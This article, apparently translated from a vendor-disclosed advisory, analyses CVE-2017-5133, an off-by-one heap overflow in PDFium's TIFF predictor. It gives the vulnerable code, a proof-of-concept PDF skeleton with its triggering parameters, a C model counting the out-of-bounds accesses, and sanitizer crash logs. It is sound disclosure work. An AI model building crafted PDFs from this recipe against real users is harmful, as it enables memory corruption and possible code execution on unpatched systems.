
Google PDFium TIFF Image Flate Decoder Code Execution Vulnerability Analysis (CVE-2017...
2017-10-28 15:00:22

*The vulnerability discussed in this article has been reported to the vendor and fixed. This article is for technical research and discussion only; use for illegal purposes is strictly prohibited, and all resulting consequences are borne by the user.

CVE ID:

CVE-2017-5133

Summary

A heap read/write vulnerability exists in the TIFF image decoder functionality of PDFium as used by the Chrome browser, up to and including version 60.0.3112.101. A specially crafted PDF file can trigger an off-by-one read and write on the heap, resulting in memory corruption, possible information disclosure and potential code execution. The victim needs to open the malicious PDF in the browser to trigger this vulnerability.

Tested Versions

Google Chrome 60.0.3112.101

Product URL

https://pdfium.googlesource.com

CVSSv3 Score

7.5 - CVSS:3.0 / AV:N / AC:H / PR:N / UI:R / S:U / C:H / I:H / A:H

Details

PDFium is an open-source PDF renderer developed by Google, widely used in the Chrome browser, in online services and in other standalone applications. This bug was tested against the latest git revision as well as the latest Chromium AddressSanitizer build (asan-linux-release-498039).

A heap buffer overflow exists in the code responsible for decoding compressed TIFF image streams. While parsing the pixel data of a Flate-decoded image stream, the function TIFF_PredictLine is reached:

void TIFF_PredictLine(uint8_t* dest_buf,
                      uint32_t row_size,
                      int BitsPerComponent,
                      int Colors,
                      int Columns) {
  int BytesPerPixel = BitsPerComponent * Colors / 8;
  if (BitsPerComponent == 16) {
    for (uint32_t i = BytesPerPixel; i < row_size; i += 2) {
      // Touches dest_buf[i + 1] without checking that it lies within row_size
      uint16_t pixel =
          (dest_buf[i - BytesPerPixel] << 8) | dest_buf[i - BytesPerPixel + 1];
      pixel += (dest_buf[i] << 8) | dest_buf[i + 1];
      dest_buf[i] = pixel >> 8;
      dest_buf[i + 1] = (uint8_t)pixel;
    }
  }
  // ... (handling of other bit depths omitted)
}

In the code above, each iteration of the for loop always reads 4 bytes from dest_buf, even when the remaining length of the buffer is smaller than that. This can lead to an off-by-one read on the heap, immediately followed by an off-by-one write. Several conditions must be met to reach the vulnerable code and trigger the vulnerable state. In the calling function, TIFF_Predictor, we see:

bool TIFF_Predictor(uint8_t*& data_buf,
                    uint32_t& data_size,
                    int Colors,
                    int BitsPerComponent,
                    int Columns) {
  int row_size = (Colors * BitsPerComponent * Columns + 7) / 8;            [1]
  if (row_size == 0)
    return false;
  const int row_count = (data_size + row_size - 1) / row_size;
  const int last_row_size = data_size % row_size;                          [2]
  for (int row = 0; row < row_count; row++) {
    uint8_t* scan_line = data_buf + row * row_size;
    if ((row + 1) * row_size > (int)data_size) {
      row_size = last_row_size;                                            [3]
    }
    TIFF_PredictLine(scan_line, row_size, BitsPerComponent, Colors, Columns); [4]
  }
  return true;
}

At [1], row_size is computed, rounded up to a whole number of bytes (a multiple of 8 bits). At [2], the size of the last row is computed, since the input data may not have a full row_size worth of bytes available. When the last row is being processed (i.e. when the next row would end beyond the data size), row_size is set to last_row_size [3]. At [4], the vulnerable function TIFF_PredictLine is called with the computed row size last_row_size. If the buffer size is arranged correctly, this can result in a final row_size of 3 while TIFF_PredictLine actually reads/writes 4 bytes from the data buffer, causing an off-by-one read/write.
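As an added example (not PDFium's code), the arithmetic above modelled in C with the predictor parameters of the proof-of-concept that follows (Columns 2, Colors 1, BitsPerComponent 16): it counts, instead of performing, each sample access that would land past a 23-byte stream, and the "hardened" flag is this example's own suggested check rather than the vendor patch.

```c
#include <stdint.h>
#include <stdio.h>

/* Model of TIFF_Predictor's 16-bit path that counts, rather than performs,
 * each sample access landing outside the data_size-byte buffer. The
 * "hardened" flag is this example's own suggested check, not the vendor patch. */
struct layout { int row_size; int row_count; int last_row_size; };  /* [1], [2] */

static struct layout layout_for(uint32_t data_size, int colors, int bpc, int columns) {
  struct layout l;
  l.row_size = (colors * bpc * columns + 7) / 8;              /* [1] */
  l.row_count = l.row_size ? (int)((data_size + l.row_size - 1) / l.row_size) : 0;
  l.last_row_size = l.row_size ? (int)(data_size % l.row_size) : 0;  /* [2] */
  return l;
}

/* Returns how many 16-bit samples have their second byte (dest_buf[i + 1])
 * past the end of the buffer: each is one OOB read followed by one OOB write. */
static int count_oob_samples(uint32_t data_size, int colors, int bpc,
                             int columns, int hardened) {
  struct layout l = layout_for(data_size, colors, bpc, columns);
  int bytes_per_pixel = bpc * colors / 8;
  int row_size = l.row_size, oob = 0;
  if (row_size == 0 || bpc != 16)
    return 0;
  for (int row = 0; row < l.row_count; row++) {
    uint32_t base = (uint32_t)(row * l.row_size);
    if ((row + 1) * l.row_size > (int)data_size)
      row_size = l.last_row_size;                             /* [3] */
    for (uint32_t i = (uint32_t)bytes_per_pixel; i < (uint32_t)row_size; i += 2) {
      if (hardened && i + 1 >= (uint32_t)row_size)
        break;                          /* both bytes of the sample must fit */
      if (base + i + 1 >= data_size)
        oob++;                          /* would touch memory past the region */
    }
  }
  return oob;
}

int main(void) {
  /* PoC parameters: Columns 2, Colors 1, BitsPerComponent 16, 23-byte stream */
  printf("23 bytes: %d OOB sample(s); hardened: %d; 24 bytes: %d\n",
         count_oob_samples(23, 1, 16, 2, 0), count_oob_samples(23, 1, 16, 2, 1),
         count_oob_samples(24, 1, 16, 2, 0));
  return 0;
}
```

With 23 bytes the layout gives row_size 4 and last_row_size 3, and the final row's single iteration (i = 2) reaches byte 23, which matches the ASan report of an access 0 bytes past a 23-byte region; with 24 bytes no row is short and nothing is out of bounds.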
An example PDF that triggers this bug:

%PDF-1.6

47 0 obj
<</DecodeParms
    <</Columns 2
      /Colors 1
      /BitsPerComponent 16
      /Predictor 2>>
  /Filter/FlateDecode
  /W[0 0 0]>>
stream
...
endstream
endobj
startxref 30
%%EOF

The stream content above needs to satisfy only one condition: it must decode to a length that yields 3 in the computation at [2] in the code shown earlier. The minimum length satisfying this and the other conditions mentioned is 23. The values of Columns, Colors and the uncompressed stream length can be adjusted to control the buffer size, the byte accesses, and ultimately the values passed to the function discussed above. Depending on the underlying allocator and other variables, abusing this bug for a memory overwrite may not be feasible, but it could be combined with other vulnerabilities to cause further memory corruption. Crash information from the build at the time (asan-linux-release-498039):

Rendering PDF file poc_test.pdf.

=================================================================

==67198==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x603000003177 at pc 0x0000025b0826 bp    
0x7fffffffcf70 sp 0x7fffffffcf68
READ of size 1 at 0x603000003177 thread T0
  #0 0x25b0825 in _ZN12_GLOBAL__N_116TIFF_PredictLineEPhjiii 
./out/Release/../../third_party/pdfium/core/fxcodec/codec/fx_codec_flate.cpp:478
  #1 0x25b0825 in ?? ??:0
  #2 0x25b2646 in TIFF_Predictor ./out/Release/../../third_party/pdfium/core/fxcodec/codec/fx_codec_flate.cpp:504
  #3 0x25b2646 in FlateOrLZWDecode ./out/Release/../../third_party/pdfium/core/fxcodec/codec/fx_codec_flate.cpp:805
  #4 0x25b2646 in ?? ??:0
  #5 0x2423440 in _Z24FPDFAPI_FlateOrLZWDecodebPKhjP15CPDF_DictionaryjPPhPj 
./out/Release/../../third_party/pdfium/core/fpdfapi/parser/fpdf_parser_decode.cpp:319
  #6 0x2423440 in ?? ??:0
  #7 0x24240a9 in _Z14PDF_DataDecodePKhjPK15CPDF_DictionaryjbPPhPjP14CFX_ByteStringPPS1_ crtstuff.c:?
  #8 0x24240a9 in ?? ??:0
  #9 0x2412602 in _ZN14CPDF_StreamAcc11LoadAllDataEbjb        
./out/Release/../../third_party/pdfium/core/fpdfapi/parser/cpdf_stream_acc.cpp:45
  #10 0x2412602 in ?? ??:0
  #11 0x23faa1b in _ZN11CPDF_Parser14LoadCrossRefV5EPlb   
./out/Release/../../third_party/pdfium/core/fpdfapi/parser/cpdf_parser.cpp:1085
  #12 0x23faa1b in ?? ??:0
  #13 0x23ed71a in _ZN11CPDF_Parser17LoadAllCrossRefV5El 
./out/Release/../../third_party/pdfium/core/fpdfapi/parser/cpdf_parser.cpp:645
  #14 0x23ed71a in ?? ??:0
  #15 0x23eaf90 in _ZN11CPDF_Parser18StartParseInternalEP13CPDF_Document 
./out/Release/../../third_party/pdfium/core/fpdfapi/parser/cpdf_parser.cpp:248
  #16 0x23eaf90 in ?? ??:0
  #17 0x20f747b in _ZN12_GLOBAL__N_116LoadDocumentImplERK13CFX_RetainPtrI22IFX_SeekableReadStreamEPKc 
./out/Release/../../third_party/pdfium/fpdfsdk/fpdfview.cpp:288
  #18 0x20f747b in ?? ??:0
  #19 0x20f7734 in FPDF_LoadCustomDocument ./out/Release/../../third_party/pdfium/fpdfsdk/fpdfview.cpp:629
  #20 0x20f7734 in ?? ??:0
  #21 0x4f64b0 in
  ZB12_GLOBAL__N_19RenderPdfERKNSt3__112basic_stringIcNS0_11char_traitslcEENS0_9allocatorlcEEEEPKcmRKNS_7Options
  ES8_ ./out/Release/../../third_party/pdfium/samples/pdfium_test.cc:1406
  #22 0x4f64b0 in ?? ??:0
  #23 0x4f3b7f in main ./out/Release/../../third_party/pdfium/samples/pdfium_test.cc:1624
  #24 0x4f3b7f in ?? ??:0
  #25 0x7ffff624e82f in __libc_start_main /build/glibc-bfm8X4/glibc-2.23/csu/../csu/libc-start.c:291
  #26 0x7ffff624e82f in ?? ??:0


  0x603000003177 is located 0 bytes to the right of 23-byte region [0x603000003160,0x603000003177)
  allocated by thread T0 here:
  #0 0x4c48e3 in __interceptor_malloc ??:?
  #1 0x4c48e3 in ?? ??:0
  #2 0x25b2106 in PartitionAllocGenericFlags 

./out/Release/../../third_party/pdfium/third_party/base/allocator/partition_allocator/partition_alloc.h:787
  #3 0x25b2106 in FX_SafeAlloc ./out/Release/../../third_party/pdfium/core/fxcrt/fx_memory.h:46
  #4 0x25b2106 in FX_AllocOrDie ./out/Release/../../third_party/pdfium/core/fxcrt/fx_memory.h:67
  #5 0x25b2106 in FlateUncompress ./out/Release/../../third_party/pdfium/core/fxcodec/codec/fx_codec_flate.cpp:556
  #6 0x25b2106 in FlateOrLZWDecode ./out/Release/../../third_party/pdfium/core/fxcodec/codec/fx_codec_flate.cpp:794
  #7 0x25b2106 in ?? ??:0
  #8 0x2423440 in _Z24FPDFAPI_FlateOrLZWDecodebPKhjP15CPDF_DictionaryjPPhPj     
./out/Release/../../third_party/pdfium/core/fpdfapi/parser/fpdf_parser_decode.cpp:319
  #9 0x2423440 in ?? ??:0
  #10 0x24240a9 in _Z14PDF_DataDecodePKhjPK15CPDF_DictionaryjbPPhPjP14CFX_ByteStringPPS1_ crtstuff.c:?
  #11 0x24240a9 in ?? ??:0
  #12 0x2412602 in _ZN14CPDF_StreamAcc11LoadAllDataEbjb 
./out/Release/../../third_party/pdfium/core/fpdfapi/parser/cpdf_stream_acc.cpp:45
  #13 0x2412602 in ?? ??:0
  #14 0x23faa1b in _ZN11CPDF_Parser14LoadCrossRefV5EPlb 
./out/Release/../../third_party/pdfium/core/fpdfapi/parser/cpdf_parser.cpp:1085
  #15 0x23faa1b in ?? ??:0
  #16 0x23ed71a in _ZN11CPDF_Parser17LoadAllCrossRefV5El 
./out/Release/../../third_party/pdfium/core/fpdfapi/parser/cpdf_parser.cpp:645
  #17 0x23ed71a in ?? ??:0
  #18 0x23eaf90 in _ZN11CPDF_Parser18StartParseInternalEP13CPDF_Document 
./out/Release/../../third_party/pdfium/core/fpdfapi/parser/cpdf_parser.cpp:248
  #19 0x23eaf90 in ?? ??:0
  #20 0x20f747b in _ZN12_GLOBAL__N_116LoadDocumentImplERK13CFX_RetainPtrI22IFX_SeekableReadStreamEPKc 
./out/Release/../../third_party/pdfium/fpdfsdk/fpdfview.cpp:288
  #21 0x20f747b in ?? ??:0
  #22 0x20f7734 in FPDF_LoadCustomDocument ./out/Release/../../third_party/pdfium/fpdfsdk/fpdfview.cpp:629
  #23 0x20f7734 in ?? ??:0
  #24 0x4f64b0 in
 ZN12_GLOBAL_N_19RenderPdfERKNSt3__112basic_stringIcNS0_11char_traitsIcEENS0_9allocatorIcEEEEPKcmRKNS_7OptionsE   
 S8_ ./out/Release/../../third_party/pdfium/samples/pdfium_test.cc:1406
  #25 0x4f64b0 in ?? ??:0
  #26 0x4f3b7f in main ./out/Release/../../third_party/pdfium/samples/pdfium_test.cc:1624
  #27 0x4f3b7f in ?? ??:0
  #28 0x7ffff624e82f in __libc_start_main /build/glibc-bfm8X4/glibc-2.23/csu/../csu/libc-start.c:291
  #29 0x7ffff624e82f in ?? ??:0


SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/user/pdfium/repo/asan-linux-release-  
498039/pdfium_test+0x25b0825)
Shadow bytes around the buggy address:
0x0c067fff85d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c067fff85e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c067fff85f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c067fff8600: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd
0x0c067fff8610: fd fd fa fa fd fd fd fa fa fa fd fd fd fa fa fa
=>0x0c067fff8620: fd fd fd fa fa fa fd fd fd fa fa fa 00 00[07]fa
0x0c067fff8630: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c067fff8640: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c067fff8650: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c067fff8660: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c067fff8670: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable:           00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone:       fa
Freed heap region:       fd
Stack left redzone:      f1
Stack mid redzone:       f2
Stack right redzone:     f3
Stack after return:      f5
Stack use after scope:   f8
Global redzone:          f9
Global init order:       f6
Poisoned by user:        f7
Container overflow:      fc
Array cookie:            ac
Intra object redzone:    bb
ASan internal:           fe
Left alloca redzone:     ca
Right alloca redzone:    cb
==67198==ABORTING

The latest official Chrome running on Windows with PageHeap enabled (BugId output):

   BugId:            OOBW[0x1FB]+0~1#b6d7 c40.313 
Location: chrome.exe!verifier.dll!AVrfpDphCheckPageHeapBlock
Description: Page heap detected heap corruption at 0x8EA7FFB; at the end of a 507/0x1FB bytes heap block at 0x8EA7E00. This appears to be a classic
buffer-overrun vulnerability. The following byte values were written to the corrupted area: 22.
Version: chrome.exe: 60.0.3112.113 (x86)
verifier.dll: 6.1.7600.16385 (x86)
Security impact: Potentially highly exploitable security issue.
Integrity level: 0x2000 (Medium Integrity; this process appears to not be sandboxed!)
Arguments: ['--enable-experimental-accessibility-features', '--enable-experimental-canvas-features', '--enable-experimental-input-
view-features', '--
enable-experimental-web-platform-features', '--enable-logging=stderr', '--enable-usermedia-screen-capturing', '--enable-viewport', '--
enable-webgl-draft-
extensions', '--enable-webvr', '--expose-internals-for-testing', '--disable-popup-blocking', '--disable-prompt-on-repost', '--force-
renderer-
accessibility',
'--javascript-harmony', '--js-flags="--expose-gc"', '--no-sandbox', 'c:\\Users\\ea\\Desktop\\poc.pdf']
Stack:
verifier.dll!VerifierStopMessage + 0x1F8 (this frame is irrelevant to this bug)
2.verifier.dll!AVrfpDphReportCorruptedBlock + 0x1C2 (this frame is irrelevant to this bug)
3.verifier.dll!AVrfpDphCheckPageHeapBlock + 0x161 (id: c40)
4.verifier.dll!AVrfpDphFindBusyMemory + 0xDA (id: 313)
5.verifier.dll!AVrfpDphFindBusyMemoryAndRemoveFromBusyList + 0x20
6.ntdll.dll!RtlpDebugPageHeapFree + ? (the exact offset is not known)
7.ntdll.dll!RtlDebugFreeHeap + 0x2F
8.ntdll.dll!RtlpFreeHeap + 0x5D
9.ntdll.dll!RtlFreeHeap + 0x142
10.kernel32.dll!HeapFree + 0x14
11.chrome_child.dll + 0x163239 (no function symbol available)
12.chrome_child.dll + 0x1852FAA (no function symbol available)
13.chrome_child.dll + 0x184DDD1 (no function symbol available)
14.chrome_child.dll + 0x1846493 (no function symbol available)
15.chrome_child.dll + 0x18488BD (no function symbol available)
16.chrome_child.dll + 0x18485B5 (no function symbol available)
17.chrome_child.dll + 0x1823308 (no function symbol available)
18.chrome_child.dll + 0x18175AB (no function symbol available)
19.chrome_child.dll + 0x181413D (no function symbol available)
20.chrome_child.dll + 0x181468D (no function symbol available)
21.chrome_child.dll + 0x181F15A (no function symbol available)
22.chrome_child.dll + 0x181E1AF (no function symbol available)
23.chrome_child.dll + 0x17CA70A (no function symbol available)
24.chrome_child.dll + 0x1437254 (no function symbol available)
25.chrome_child.dll + 0x143797E (no function symbol available)
26.chrome_child.dll + 0x16729C1 (no function symbol available)

Page heap output for heap block near 0x8EA7FFB
address 08ea7e00 found in
_DPH_HEAP_ROOT @ 4161000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
8712000: 8ea7e00 1fb - 8ea7000 2000
6ccf8e89 verifier!AVrfDebugPageHeapAllocate+0x00000229
77876206 ntdll!RtlDebugAllocateHeap+0x00000030
7783a127 ntdll!RtlpAllocateHeap+0x000000c4
77805950 ntdll!RtlAllocateHeap+0x0000023a
58de52c3 chrome_child!ovly_debug_event+0x0014dff3
5a357dd2 chrome_child!IsSandboxedProcess+0x003fb31f
5a3cf306 chrome_child!IsSandboxedProcess+0x00472853
5a379bca chrome_child!IsSandboxedProcess+0x0041d117
5a37a05d chrome_child!IsSandboxedProcess+0x0041d5aa
5a38311c chrome_child!IsSandboxedProcess+0x00426669
5a376b0e chrome_child!IsSandboxedProcess+0x0041a05b
5a376493 chrome_child!IsSandboxedProcess+0x004199e0
5a3788bd chrome_child!IsSandboxedProcess+0x0041be0a
5a3785b5 chrome_child!IsSandboxedProcess+0x0041bb02
5a353308 chrome_child!IsSandboxedProcess+0x003f6855
5a3475ab chrome_child!IsSandboxedProcess+0x003eaaf8
5a34413d chrome_child!IsSandboxedProcess+0x003e768a
5a34468d chrome_child!IsSandboxedProcess+0x003e7bda
5a34f15a chrome_child!IsSandboxedProcess+0x003f26a7
5a34e1af chrome_child!IsSandboxedProcess+0x003f16fc
5a2fa70a chrome_child!IsSandboxedProcess+0x0039dc57
59f67254 chrome_child!IsSandboxedProcess+0x0000a7a1
59f6797e chrome_child!IsSandboxedProcess+0x0000aecb
5a1a29c1 chrome_child!IsSandboxedProcess+0x00245f0e
5a1a2be2 chrome_child!IsSandboxedProcess+0x0024612f
5a17e7ea chrome_child!IsSandboxedProcess+0x00221d37
5a17e9fb chrome_child!IsSandboxedProcess+0x00221f48
58c33f7e chrome_child+0x00103f7e
58c31129 chrome_child+0x00101129
58c33bc4 chrome_child+0x00103bc4
58c996e8 chrome_child!ovly_debug_event+0x00002418
58f54b95 chrome_child!ChromeMain+0x0000b501                              

Timeline

2017-09-05 - Vendor disclosure
2017-10-19 - Public release

Reference: https://www.talosintelligence.com/reports/TALOS-2017-0432

*Author: 生如夏花. Please credit FreeBuf.COM when reposting.
